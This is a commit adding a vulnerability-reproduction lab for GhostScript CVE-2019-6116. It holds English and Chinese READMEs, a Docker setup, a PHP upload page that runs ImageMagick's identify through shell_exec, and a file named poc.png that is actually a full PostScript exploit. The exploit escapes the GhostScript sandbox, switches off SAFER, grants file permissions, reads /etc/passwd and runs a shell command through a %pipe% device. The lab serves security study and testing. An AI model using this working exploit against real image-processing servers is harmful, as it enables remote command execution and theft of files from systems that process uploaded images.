first commit

ghostscript/CVE-2019-6116/README.md

@@ -0,0 +1,38 @@
+# GhostScript Sandbox Bypass Command Execution (CVE-2019-6116)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GhostScript is a suite of software based on an interpreter for Adobe Systems' PostScript and PDF page description languages. It is widely used by many image processing libraries such as ImageMagick and Python PIL.
+
+On January 23rd, 2019, Artifex officially merged six fixes into the master branch of GhostScript to address CVE-2019-6116. This vulnerability was reported by Google security researcher Tavis on December 3rd, 2018. The vulnerability allows attackers to bypass GhostScript's security sandbox, leading to arbitrary command execution and file reading capabilities.
+
+References:
+
+- <https://bugs.chromium.org/p/project-zero/issues/detail?id=1729&desc=2>
+- <https://www.anquanke.com/post/id/170255>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable environment (including GhostScript 9.26 and ImageMagick 7.0.8-27):
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080` to see an upload component.
+
+## Vulnerability Reproduction
+
+Upload the provided [POC](poc.png) file to execute the command `id > /tmp/success`.
+
+![](1.png)
+
+You can also test this vulnerability using the command line:
+
+```
+docker run -it --rm --name uu -v `pwd`/poc.png:/tmp/poc.png vulhub/imagemagick:7.0.8-27-php identify /tmp/poc.png
+```
+
+The command will be successfully executed.
+
+![](2.png)

ghostscript/CVE-2019-6116/README.zh-cn.md

@@ -0,0 +1,36 @@
+# GhostScript 沙箱绕过命令执行漏洞（CVE-2019-6116）
+
+GhostScript 是一套基于 Adobe Systems 的 PostScript 和 PDF 页面描述语言解释器的软件。它被许多图像处理库广泛使用，如 ImageMagick、Python PIL 等。
+
+2019年1月23日，Artifex 官方在 GhostScript 的 master 分支上合并了多达6处的修复，用于修复 CVE-2019-6116 漏洞。该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。漏洞允许攻击者直接绕过 GhostScript 的安全沙箱，从而执行任意命令或读取任意文件。
+
+参考链接：
+
+- <https://bugs.chromium.org/p/project-zero/issues/detail?id=1729&desc=2>
+- <https://www.anquanke.com/post/id/170255>
+
+## 环境搭建
+
+执行如下命令启动漏洞环境（其中包括 GhostScript 9.26 和 ImageMagick 7.0.8-27）：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8080` 将看到一个文件上传组件。
+
+## 漏洞复现
+
+上传提供的 [POC](poc.png) 文件，即可执行命令 `id > /tmp/success`。
+
+![](1.png)
+
+你也可以使用命令行来测试该漏洞：
+
+```
+docker run -it --rm --name uu -v `pwd`/poc.png:/tmp/poc.png vulhub/imagemagick:7.0.8-27-php identify /tmp/poc.png
+```
+
+命令将被成功执行。
+
+![](2.png)

ghostscript/CVE-2019-6116/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ web:
+   image: vulhub/imagemagick:7.0.8-27-php
+   command: php -t /var/www/html -S 0.0.0.0:8080
+   volumes:
+    - ./index.php:/var/www/html/index.php
+   ports:
+    - "8080:8080"

ghostscript/CVE-2019-6116/index.php

@@ -0,0 +1,21 @@
+<?php
+
+if (!empty($_FILES)):
+
+$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
+if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
+    die('Unsupported filetype uploaded.');
+}
+
+$size = shell_exec("identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}");
+
+echo "Image size is: $size";
+
+else:
+?>
+<form method="post" enctype="multipart/form-data">
+    File: <input type="file" name="file_upload">
+    <input type="submit">
+</form>
+<?php
+endif;

ghostscript/CVE-2019-6116/poc.png

@@ -0,0 +1,73 @@
+%!PS
+% extract .actual_pdfpaintproc operator from pdfdict
+/.actual_pdfpaintproc pdfdict /.actual_pdfpaintproc get def
+
+/exploit {
+    (Stage 11: Exploitation...)=
+
+    /forceput exch def
+
+    systemdict /SAFER false forceput
+    userparams /LockFilePermissions false forceput
+    systemdict /userparams get /PermitFileControl [(*)] forceput
+    systemdict /userparams get /PermitFileWriting [(*)] forceput
+    systemdict /userparams get /PermitFileReading [(*)] forceput
+
+    % update
+    save restore
+
+    % All done.
+    stop
+} def
+
+errordict /typecheck {
+    /typecount typecount 1 add def
+    (Stage 10: /typecheck #)=only typecount ==
+
+    % The first error will be the .knownget, which we handle and setup the
+    % stack. The second error will be the ifelse (missing boolean), and then we
+    % dump the operands.
+    typecount 1 eq { null } if
+    typecount 2 eq { pop 7 get exploit } if
+    typecount 3 eq { (unexpected)= quit }  if
+} put
+
+% The pseudo-operator .actual_pdfpaintproc from pdf_draw.ps pushes some
+% executable arrays onto the operand stack that contain .forceput, but are not
+% marked as executeonly or pseudo-operators.
+%
+% The routine was attempting to pass them to ifelse, but we can cause that to
+% fail because when the routine was declared, it used `bind` but many of the
+% names it uses are not operators and so are just looked up in the dictstack.
+%
+% This means we can push a dict onto the dictstack and control how the routine
+% works.
+<<
+    /typecount      0
+    /PDFfile        { (Stage 0: PDFfile)= currentfile }
+    /q              { (Stage 1: q)= } % no-op
+    /oget           { (Stage 3: oget)= pop pop 0 } % clear stack
+    /pdfemptycount  { (Stage 4: pdfemptycount)= } % no-op
+    /gput           { (Stage 5: gput)= }  % no-op
+    /resolvestream  { (Stage 6: resolvestream)= } % no-op
+    /pdfopdict      { (Stage 7: pdfopdict)= } % no-op
+    /.pdfruncontext { (Stage 8: .pdfruncontext)= 0 1 mark } % satisfy counttomark and index
+    /pdfdict        { (Stage 9: pdfdict)=
+        % cause a /typecheck error we handle above
+        true
+    }
+>> begin <<>> <<>> { .actual_pdfpaintproc } stopped pop
+
+(Should now have complete control over ghostscript, attempting to read /etc/passwd...)=
+
+% Demonstrate reading a file we shouldnt have access to.
+(/etc/passwd) (r) file dup 64 string readline pop == closefile
+
+(Attempting to execute a shell command...)= flush
+
+% run command
+(%pipe%id > /tmp/success) (w) file closefile
+
+(All done.)=
+
+quit